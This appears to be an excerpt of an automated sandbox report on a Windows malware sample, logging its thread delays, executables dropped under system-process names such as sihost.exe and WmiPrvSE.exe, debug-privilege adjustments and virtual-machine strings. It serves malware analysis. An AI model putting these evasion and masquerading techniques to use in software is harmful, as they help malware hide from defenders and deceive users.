      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3593891s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3593749s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3593638s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3593437s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3593094s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3592937s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3592687s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3592437s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3592297s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3592088s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591937s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591797s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591655s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591540s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591350s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591234s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591124s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3591015s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590904s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590788s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590687s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590572s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590467s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590355s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590233s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590122s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3590015s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3589905s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3589796s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3589682s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3589562s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3589453s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 7112Thread sleep time: -3589343s >= -30000sJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 5316Thread sleep count: 1273 > 30Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe TID: 2008Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe TID: 5684Thread sleep count: 1256 > 30Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe TID: 1708Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe TID: 5216Thread sleep count: 946 > 30Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe TID: 4760Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe TID: 4180Thread sleep count: 1093 > 30Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe TID: 5960Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe TID: 2576Thread sleep count: 956 > 30
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe TID: 4424Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe TID: 6164Thread sleep count: 1167 > 30
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe TID: 5716Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe TID: 5220Thread sleep count: 1162 > 30
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe TID: 3152Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\Desktop\w9d568i4Ia.exe TID: 6536Thread sleep count: 1191 > 30
      Source: C:\Users\user\Desktop\w9d568i4Ia.exe TID: 6504Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA6F0.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeDropped PE file which has not been started: C:\Program Files (x86)\windows nt\RCXABD4.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeDropped PE file which has not been started: C:\Users\user\Desktop\RCX974A.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeDropped PE file which has not been started: C:\Users\user\Pictures\Camera Roll\RCX9CF9.tmpJump to dropped file
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeDropped PE file which has not been started: C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA23A.tmpJump to dropped file
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3599839Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3598500Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3598187Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3597891Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3597623Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3597250Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596937Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596775Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596606Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596497Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596343Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596000Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595842Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595594Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595391Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595187Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595045Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594796Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594641Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594500Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594336Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594187Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593891Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593749Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593638Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593437Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593094Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592937Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592687Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592437Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592297Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592088Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591937Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591797Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591655Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591540Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591350Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591234Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591124Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591015Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590904Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590788Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590687Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590572Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590467Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590355Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590233Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590122Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590015Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589905Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589796Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589682Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589562Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589453Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589343Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWindow / User API: threadDelayed 3299Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeWindow / User API: threadDelayed 9408Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeWindow / User API: threadDelayed 1273Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeWindow / User API: threadDelayed 1256Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeWindow / User API: threadDelayed 946Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeWindow / User API: threadDelayed 1093Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeWindow / User API: threadDelayed 956
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeWindow / User API: threadDelayed 1167
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeWindow / User API: threadDelayed 1162
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeWindow / User API: threadDelayed 1191
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3600000Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3599839Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3598500Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3598187Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3597891Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3597623Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3597250Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596937Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596775Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596606Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596497Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596343Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3596000Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595842Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595594Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595391Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595187Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3595045Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594796Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594641Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594500Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594336Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3594187Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593891Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593749Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593638Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593437Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3593094Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592937Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592687Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592437Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592297Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3592088Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591937Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591797Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591655Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591540Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591350Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591234Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591124Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3591015Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590904Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590788Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590687Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590572Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590467Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590355Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590233Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590122Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3590015Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589905Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589796Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589682Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589562Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589453Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 3589343Jump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeThread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeFile Volume queried: C:\ FullSizeInformation
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeFile Volume queried: C:\ FullSizeInformation
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeFile Volume queried: C:\ FullSizeInformation
      Source: w9d568i4Ia.exe, 00000000.00000003.349209728.000000001BE16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
      Source: vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.546597154.000000001B8C0000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 00000021.00000002.363378359.000001BC87A16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess token adjusted: Debug
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess token adjusted: Debug
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeMemory allocated: page read and write | page guardJump to behavior
